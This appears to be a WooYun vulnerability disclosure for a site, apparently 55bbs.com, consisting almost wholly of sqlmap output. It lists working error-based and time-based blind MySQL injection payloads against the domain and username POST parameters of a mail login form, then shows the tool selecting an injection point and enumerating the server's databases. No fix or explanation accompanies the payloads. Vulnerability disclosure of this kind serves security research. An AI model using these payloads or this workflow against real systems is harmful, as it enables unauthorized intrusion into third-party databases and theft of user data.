WooYun.org

Parameter: domain (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 3084 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(3084=3084,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EkhN'='EkhN&nosameip=on
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT * FROM (SELECT(SLEEP(5)))LJhz) AND 'Vcus'='Vcus&nosameip=on
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin' AND (SELECT 7724 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(7724=7724,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AqVK'='AqVK&password=2121&domain=55bbs.com&nosameip=on
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))gwoO) AND 'eZmf'='eZmf&password=2121&domain=55bbs.com&nosameip=on
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: domain, type: Single quoted string (default)
[1] place: POST, parameter: username, type: Single quoted string
[q] Quit
> 0
[17:03:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0
[17:03:12] [INFO] fetching database names
[17:03:12] [INFO] the SQL query used returns 3 entries
[17:03:12] [INFO] resumed: information_schema
[17:03:12] [INFO] resumed: extmail
[17:03:12] [INFO] resumed: test
available databases [3]:
[*] extmail
[*] information_schema
[*] test